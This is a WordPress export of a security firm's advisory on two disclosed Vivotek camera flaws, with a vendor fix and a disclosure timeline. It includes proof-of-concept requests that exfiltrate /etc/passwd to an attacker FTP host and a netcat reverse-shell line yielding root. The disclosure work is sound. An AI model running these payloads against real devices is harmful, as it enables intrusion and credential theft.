{"id":5164,"date":"2020-06-25T09:23:27","date_gmt":"2020-06-25T08:23:27","guid":{"rendered":"https:\/\/www.dionach.com\/?p=5164"},"modified":"2026-03-26T10:54:55","modified_gmt":"2026-03-26T10:54:55","slug":"multiple-vulnerabilities-in-vivotek-camera","status":"publish","type":"post","link":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/","title":{"rendered":"Multiple Vulnerabilities in Vivotek Camera"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"5164\" class=\"elementor elementor-5164\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-556693eb elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"556693eb\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-304910ed\" data-id=\"304910ed\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-35212935 elementor-widget elementor-widget-text-editor\" data-id=\"35212935\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<strong>Author:<\/strong> Mike Manzotti &#8211; Senior Consultant\r\n\r\nIn a recent security engagement Vivotek Camera IT9388-HT (firmware version: 0100p) was found to be vulnerable to arbitrary file download (CVE-2020-11949) and remote command execution (CVE-2020-11950). Vivotek Camera IT9388-HT is a weatherproof network camera for surveillance and CCTV networks which comes with motion, tamper detection and infrared illumination. Under the hood, it&#8217;s a Linux system based on the ARM architecture and the configuration settings are made via a web interface, which is pretty common for an IoT (Internet of things) device.\r\n\r\n<img fetchpriority=\"high\" decoding=\"async\" data-recalc-dims=\"1\" class=\"size-full wp-image-5165 aligncenter\" src=\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2020\/06\/Vivotek.png?resize=288%2C288&#038;ssl=1\" alt=\"Multiple security vulnerabilities in Vivotek cameras firmware\" width=\"288\" height=\"288\" srcset=\"https:\/\/i0.wp.com\/dionach.development-visionsharp.co.uk\/wp-content\/uploads\/2020\/06\/Vivotek.png?w=288&amp;ssl=1 288w, https:\/\/i0.wp.com\/dionach.development-visionsharp.co.uk\/wp-content\/uploads\/2020\/06\/Vivotek.png?resize=150%2C150&amp;ssl=1 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" \/>\r\n<h2>Arbitrary File Download: CVE-2020-11949<\/h2>\r\nThe Vivotek camera allows an authenticated user to schedule tasks which can be triggered at a certain time or when an event happens via the motion or tamper detection controls. The scheduled tasks can be created via the web interface or by uploading a script file. The web interface allows the user to specify a system log file and an external FTP server, and then permits the user to test the configuration by sending a test file to the specified FTP server. However, a malicious user can force the camera to send any local file to a malicious user&#8217;s FTP server.\r\n\r\nAs a proof of concept example, the following request forces the camera to send the &#8220;\/etc\/passwd&#8221; file to the attacker&#8217;s FTP server:\r\n<pre>POST http:\/\/&lt;CAMERA_IP&gt;\/cgi-bin\/admin\/testserver.cgi\r\ntype=ftp&amp;address=<strong>&lt;ATTACKER_IP&gt;+.+\/etc\/passwd+#<\/strong>&amp;username=anonymous&amp;port=21&amp;sslmode=&amp;passive=1&amp;url=&amp;location=ls&amp;senderemail=&amp;recipientemail=&amp;workgroup=&amp;groupidx=0<\/pre>\r\nThe following output shows the file was successfully received by the attacker&#8217;s FTP server:\r\n<pre>$ python -m pyftpdlib -p 21 -w\r\n[I 2020-02-18 22:24:07] [MASKED]:58474-[] FTP session opened (connect)\r\n[I 2020-02-18 22:24:07] [MASKED]::58474-[anonymous] USER 'anonymous' logged in.\r\n[I 2020-02-18 22:24:07] [MASKED]::58474-[anonymous] CWD \/root\/Scans 250\r\n[I 2020-02-18 22:24:07] [MASKED]::58474-[anonymous] <strong>STOR \/root\/Scans\/passwd completed=1<\/strong> bytes=234 seconds=0.012\r\n[I 2020-02-18 22:24:07] [MASKED]:14:58474-[anonymous] FTP session closed (disconnect).\r\n^C[I 2020-02-18 22:24:10] received interrupt signal\r\n[I 2020-02-18 22:24:10] &gt;&gt;&gt; shutting down FTP server, 1 socket(s), pid=452478 &lt;&lt;&lt;<\/pre>\r\nWith this vulnerability an attacker could gain access to the &#8220;\/etc\/passwd&#8221; file of the camera containing password hashes:\r\n<pre>$ cat passwd\r\nroot:<strong>$1$iC$To**********************************6<\/strong>:\/mnt\/ramdisk:\/bin\/sh\r\ntmis:x:9999:9999:Linux User,,,:\/home\/tmis:\/bin\/sh\r\nviewer:<strong>$1$kD$***********************************7<\/strong>:\/tmp:\/bin\/bash<\/pre>\r\n<u>Limitations <\/u>\r\n\r\nAn attacker would need to reach the Vivotek camera&#8217;s web interface and have authenticated access.\r\n\r\nBelow is proof of concept video showing the exploitation process:\r\n\r\n<div style=\"width: 1200px;\" class=\"wp-video\"><video class=\"wp-video-shortcode\" id=\"video-5164-1\" width=\"1200\" height=\"539\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/mp4\" src=\"https:\/\/dionach.development-visionsharp.co.uk\/wp-content\/uploads\/2020\/06\/Arbitrary-File-Download-CVE-2020-11949-1.mp4?_=1\" \/><a href=\"https:\/\/dionach.development-visionsharp.co.uk\/wp-content\/uploads\/2020\/06\/Arbitrary-File-Download-CVE-2020-11949-1.mp4\">https:\/\/dionach.development-visionsharp.co.uk\/wp-content\/uploads\/2020\/06\/Arbitrary-File-Download-CVE-2020-11949-1.mp4<\/a><\/video><\/div>\r\n<h2><\/h2>\r\n<h2>Remote Command Execution: CVE-2020-11950<\/h2>\r\nThe Vivotek camera web interface allows a user to create scheduled tasks as discussed previously. The scheduled tasks can be created via the web interface or uploading a script file. However, a malicious web user can abuse the upload functionality to upload a script file which, once triggered, will force the camera to execute operating system commands.\r\n\r\nAs a proof of concept example, the following script file connects to a specified server and spawns a remote command and control session via &#8220;sh&#8221;:\r\n<pre>POST http:\/\/&lt;CAMERA_IP&gt;\/cgi-bin\/admin\/eventscript.cgi\u00a0\r\n[\u2026]\r\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\r\n&lt;eventmgr version=\"0101\"&gt;\r\n&lt;maxprocess&gt;1&lt;\/maxprocess&gt;\r\n&lt;schedule id=\"0\"&gt;\r\n&lt;duration&gt;\r\n&lt;weekday&gt;1-5&lt;\/weekday&gt;\r\n&lt;time&gt;00:00:00-23:59:59&lt;\/time&gt;\r\n&lt;\/duration&gt;\r\n&lt;\/schedule&gt;\r\n&lt;event id=\"0\"&gt;\r\n&lt;description&gt;RCE Test&lt;\/description&gt;\r\n&lt;condition&gt;&lt;\/condition&gt;\r\n&lt;delay&gt;1&lt;\/delay&gt;\r\n&lt;process&gt;\r\n<strong>\/usr\/bin\/nc &lt;ATTACKER_IP&gt; 80 -e \/bin\/sh<\/strong>\r\n&lt;\/process&gt;\r\n&lt;priority&gt;10&lt;\/priority&gt;\r\n&lt;\/event&gt;\r\n&lt;\/eventmgr&gt;\r\n[\u2026]<\/pre>\r\nAs soon as the file script is uploaded, the attacker can interact with the generated session as shown below:\r\n<pre>$ nc -lvp 80\r\nlistening on [any] 80 ...\r\n[MASKED]: inverse host lookup failed: Unknown host\r\nconnect to [MASKED] from (UNKNOWN) [MASKED] 45179\r\nid\r\nuid=0(root) gid=0(root)<\/pre>\r\n<u>Limitations <\/u>\r\n\r\nAn attacker would need to reach the Vivotek camera&#8217;s web interface and have authenticated access.\r\n\r\nBelow is proof of concept video showing the exploitation process:\r\n\r\n<div style=\"width: 1200px;\" class=\"wp-video\"><video class=\"wp-video-shortcode\" id=\"video-5164-2\" width=\"1200\" height=\"539\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/mp4\" src=\"https:\/\/dionach.com\/wp-content\/uploads\/2020\/06\/Remote-Command-Execution-CVE-2020-11950.mp4?_=2\" \/><a href=\"https:\/\/dionach.com\/wp-content\/uploads\/2020\/06\/Remote-Command-Execution-CVE-2020-11950.mp4\">https:\/\/dionach.com\/wp-content\/uploads\/2020\/06\/Remote-Command-Execution-CVE-2020-11950.mp4<\/a><\/video><\/div>\r\n\r\n&nbsp;\r\n<h2>Mitigation<\/h2>\r\nThe vulnerabilities have been disclosed with the vendor who has released a new firmware version 1.2001.13.01a that fixes both issues. It&#8217;s worth noting that Vivotek were very helpful and responsive during our communication and were keen to address these vulnerabilities quickly. Below is the vulnerability disclosure timeline:\r\n\r\n&nbsp;\r\n<table style=\"width: 820.2px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 104px; text-align: center;\"><strong>Date<\/strong><\/td>\r\n<td style=\"width: 703.2px;\"><strong>Action<\/strong><\/td>\r\n<\/tr>\r\n<tr>\r\n<td style=\"width: 104px; text-align: center;\">03\/03\/2020<\/td>\r\n<td style=\"width: 703.2px;\">Details of both vulnerabilities have been emailed to the vendor at <a href=\"mailto:security@vivotek.com\">security@vivotek.com<\/a>.<\/td>\r\n<\/tr>\r\n<tr>\r\n<td style=\"width: 104px; text-align: center;\">04\/03\/2020<\/td>\r\n<td style=\"width: 703.2px;\">Vendor response acknowledged the vulnerabilities and an internal ticket was raised.<\/td>\r\n<\/tr>\r\n<tr>\r\n<td style=\"width: 104px; text-align: center;\">12\/03\/2020<\/td>\r\n<td style=\"width: 703.2px;\">Dionach asked for an update.<\/td>\r\n<\/tr>\r\n<tr>\r\n<td style=\"width: 104px; text-align: center;\">13\/03\/2020<\/td>\r\n<td style=\"width: 703.2px;\">Vendor said they were working on a firmware update.<\/td>\r\n<\/tr>\r\n<tr>\r\n<td style=\"width: 104px; text-align: center;\">06\/04\/2020<\/td>\r\n<td style=\"width: 703.2px;\">Vendor confirmed that the new firmware will be ready for testing on the week commencing 17\/03.<\/td>\r\n<\/tr>\r\n<tr>\r\n<td style=\"width: 104px; text-align: center;\">20\/04\/2020<\/td>\r\n<td style=\"width: 703.2px;\">Vendor provided the new firmware. Dionach confirmed the vulnerabilities are now fixed.<\/td>\r\n<\/tr>\r\n<tr>\r\n<td style=\"width: 104px; text-align: center;\">21\/04\/2020<\/td>\r\n<td style=\"width: 703.2px;\">CVE numbers have been allocated. Vendor stated that in middle of June all cameras firmware will be released.<\/td>\r\n<\/tr>\r\n<tr>\r\n<td style=\"width: 104px; text-align: center;\">26\/05\/2020<\/td>\r\n<td style=\"width: 703.2px;\">Firmware updates have been released (<a href=\"http:\/\/download.vivotek.com\/downloadfile\/support\/cyber-security\/vvtk-sa-2020-001-v1.pdf\">VVTK-SA-2020-001<\/a>).<\/td>\r\n<\/tr>\r\n<tr>\r\n<td style=\"width: 104px; text-align: center;\">25\/06\/2020<\/td>\r\n<td style=\"width: 703.2px;\">CVE-2020-11949 and CVE-2020-11950 have been publicly disclosed<\/td>\r\n<\/tr>\r\n<\/tbody>\r\n<\/table>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Author: Mike Manzotti &#8211; Senior Consultant<br \/>\nIn a recent security engagement Vivotek Camera IT9388-HT (firmware version: 0100p) was found to be vulnerable to arbitrary file download (CVE-2020-11949) and remote command execution (CVE-2020-11950). <\/p>\n","protected":false},"author":12,"featured_media":27505,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[212,215,207],"class_list":["post-5164","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-researchblog","tag-red_team","tag-vulnerabilities","tag-web_applications","wpbf-post"],"contentshake_article_id":"","yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Multiple Vulnerabilities in Vivotek Camera<\/title>\n<meta name=\"description\" content=\"Explore critical vulnerabilities in Vivotek cameras, including risks, exploitation methods, and how to protect your devices and network.\" \/>\n<meta name=\"robots\" content=\"noindex, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Multiple Vulnerabilities in Vivotek Camera\" \/>\n<meta property=\"og:description\" content=\"Explore critical vulnerabilities in Vivotek cameras, including risks, exploitation methods, and how to protect your devices and network.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/\" \/>\n<meta property=\"og:site_name\" content=\"Dionach\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dionachcyber\" \/>\n<meta property=\"article:published_time\" content=\"2020-06-25T08:23:27+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-03-26T10:54:55+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/dionach.development-visionsharp.co.uk\/wp-content\/uploads\/2020\/06\/AdobeStock_88804485.jpeg?fit=2048%2C1365&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"2048\" \/>\n\t<meta property=\"og:image:height\" content=\"1365\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Dionach by Nomios\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@dionachcyber\" \/>\n<meta name=\"twitter:site\" content=\"@dionachcyber\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Dionach by Nomios\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/multiple-vulnerabilities-in-vivotek-camera\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/multiple-vulnerabilities-in-vivotek-camera\\\/\"},\"author\":{\"name\":\"Dionach by Nomios\",\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/#\\\/schema\\\/person\\\/ed6aa44da446ce6779a295157df0d451\"},\"headline\":\"Multiple Vulnerabilities in Vivotek Camera\",\"datePublished\":\"2020-06-25T08:23:27+00:00\",\"dateModified\":\"2026-03-26T10:54:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/multiple-vulnerabilities-in-vivotek-camera\\\/\"},\"wordCount\":591,\"publisher\":{\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/multiple-vulnerabilities-in-vivotek-camera\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/i0.wp.com\\\/dionach.development-visionsharp.co.uk\\\/wp-content\\\/uploads\\\/2020\\\/06\\\/AdobeStock_88804485.jpeg?fit=2048%2C1365&ssl=1\",\"keywords\":[\"red team\",\"vulnerabilities\",\"web applications\"],\"articleSection\":[\"researchblog\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/multiple-vulnerabilities-in-vivotek-camera\\\/\",\"url\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/multiple-vulnerabilities-in-vivotek-camera\\\/\",\"name\":\"Multiple Vulnerabilities in Vivotek Camera\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/multiple-vulnerabilities-in-vivotek-camera\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/multiple-vulnerabilities-in-vivotek-camera\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/i0.wp.com\\\/dionach.development-visionsharp.co.uk\\\/wp-content\\\/uploads\\\/2020\\\/06\\\/AdobeStock_88804485.jpeg?fit=2048%2C1365&ssl=1\",\"datePublished\":\"2020-06-25T08:23:27+00:00\",\"dateModified\":\"2026-03-26T10:54:55+00:00\",\"description\":\"Explore critical vulnerabilities in Vivotek cameras, including risks, exploitation methods, and how to protect your devices and network.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/multiple-vulnerabilities-in-vivotek-camera\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/multiple-vulnerabilities-in-vivotek-camera\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/multiple-vulnerabilities-in-vivotek-camera\\\/#primaryimage\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/dionach.development-visionsharp.co.uk\\\/wp-content\\\/uploads\\\/2020\\\/06\\\/AdobeStock_88804485.jpeg?fit=2048%2C1365&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/dionach.development-visionsharp.co.uk\\\/wp-content\\\/uploads\\\/2020\\\/06\\\/AdobeStock_88804485.jpeg?fit=2048%2C1365&ssl=1\",\"width\":2048,\"height\":1365,\"caption\":\"Vivotek Camera\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/multiple-vulnerabilities-in-vivotek-camera\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/homepage-usa\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Multiple Vulnerabilities in Vivotek Camera\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/#website\",\"url\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/\",\"name\":\"Dionach\",\"description\":\"Real Security in a Virtual World\",\"publisher\":{\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/#organization\",\"name\":\"Dionach\",\"url\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dionach.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg\",\"contentUrl\":\"https:\\\/\\\/dionach.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg\",\"width\":512,\"height\":512,\"caption\":\"Dionach\"},\"image\":{\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dionachcyber\",\"https:\\\/\\\/x.com\\\/dionachcyber\",\"https:\\\/\\\/uk.linkedin.com\\\/company\\\/dionach-ltd\",\"https:\\\/\\\/www.instagram.com\\\/dionachcyber\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dionach.development-visionsharp.co.uk\\\/en-us\\\/#\\\/schema\\\/person\\\/ed6aa44da446ce6779a295157df0d451\",\"name\":\"Dionach by Nomios\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/175b11c7f601b43fdf197d3d5c39805acf0e97b19ca7a4c4aa333ac557e98a09?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/175b11c7f601b43fdf197d3d5c39805acf0e97b19ca7a4c4aa333ac557e98a09?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/175b11c7f601b43fdf197d3d5c39805acf0e97b19ca7a4c4aa333ac557e98a09?s=96&d=mm&r=g\",\"caption\":\"Dionach by Nomios\"},\"sameAs\":[\"http:\\\/\\\/Dionach\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Multiple Vulnerabilities in Vivotek Camera","description":"Explore critical vulnerabilities in Vivotek cameras, including risks, exploitation methods, and how to protect your devices and network.","robots":{"index":"noindex","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Multiple Vulnerabilities in Vivotek Camera","og_description":"Explore critical vulnerabilities in Vivotek cameras, including risks, exploitation methods, and how to protect your devices and network.","og_url":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/","og_site_name":"Dionach","article_publisher":"https:\/\/www.facebook.com\/dionachcyber","article_published_time":"2020-06-25T08:23:27+00:00","article_modified_time":"2026-03-26T10:54:55+00:00","og_image":[{"width":2048,"height":1365,"url":"https:\/\/i0.wp.com\/dionach.development-visionsharp.co.uk\/wp-content\/uploads\/2020\/06\/AdobeStock_88804485.jpeg?fit=2048%2C1365&ssl=1","type":"image\/jpeg"}],"author":"Dionach by Nomios","twitter_card":"summary_large_image","twitter_creator":"@dionachcyber","twitter_site":"@dionachcyber","twitter_misc":{"Written by":"Dionach by Nomios","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/#article","isPartOf":{"@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/"},"author":{"name":"Dionach by Nomios","@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/#\/schema\/person\/ed6aa44da446ce6779a295157df0d451"},"headline":"Multiple Vulnerabilities in Vivotek Camera","datePublished":"2020-06-25T08:23:27+00:00","dateModified":"2026-03-26T10:54:55+00:00","mainEntityOfPage":{"@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/"},"wordCount":591,"publisher":{"@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/#organization"},"image":{"@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/dionach.development-visionsharp.co.uk\/wp-content\/uploads\/2020\/06\/AdobeStock_88804485.jpeg?fit=2048%2C1365&ssl=1","keywords":["red team","vulnerabilities","web applications"],"articleSection":["researchblog"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/","url":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/","name":"Multiple Vulnerabilities in Vivotek Camera","isPartOf":{"@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/#primaryimage"},"image":{"@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/dionach.development-visionsharp.co.uk\/wp-content\/uploads\/2020\/06\/AdobeStock_88804485.jpeg?fit=2048%2C1365&ssl=1","datePublished":"2020-06-25T08:23:27+00:00","dateModified":"2026-03-26T10:54:55+00:00","description":"Explore critical vulnerabilities in Vivotek cameras, including risks, exploitation methods, and how to protect your devices and network.","breadcrumb":{"@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/#primaryimage","url":"https:\/\/i0.wp.com\/dionach.development-visionsharp.co.uk\/wp-content\/uploads\/2020\/06\/AdobeStock_88804485.jpeg?fit=2048%2C1365&ssl=1","contentUrl":"https:\/\/i0.wp.com\/dionach.development-visionsharp.co.uk\/wp-content\/uploads\/2020\/06\/AdobeStock_88804485.jpeg?fit=2048%2C1365&ssl=1","width":2048,"height":1365,"caption":"Vivotek Camera"},{"@type":"BreadcrumbList","@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/homepage-usa\/"},{"@type":"ListItem","position":2,"name":"Multiple Vulnerabilities in Vivotek Camera"}]},{"@type":"WebSite","@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/#website","url":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/","name":"Dionach","description":"Real Security in a Virtual World","publisher":{"@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/#organization","name":"Dionach","url":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/#\/schema\/logo\/image\/","url":"https:\/\/dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg","contentUrl":"https:\/\/dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg","width":512,"height":512,"caption":"Dionach"},"image":{"@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dionachcyber","https:\/\/x.com\/dionachcyber","https:\/\/uk.linkedin.com\/company\/dionach-ltd","https:\/\/www.instagram.com\/dionachcyber\/"]},{"@type":"Person","@id":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/#\/schema\/person\/ed6aa44da446ce6779a295157df0d451","name":"Dionach by Nomios","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/175b11c7f601b43fdf197d3d5c39805acf0e97b19ca7a4c4aa333ac557e98a09?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/175b11c7f601b43fdf197d3d5c39805acf0e97b19ca7a4c4aa333ac557e98a09?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/175b11c7f601b43fdf197d3d5c39805acf0e97b19ca7a4c4aa333ac557e98a09?s=96&d=mm&r=g","caption":"Dionach by 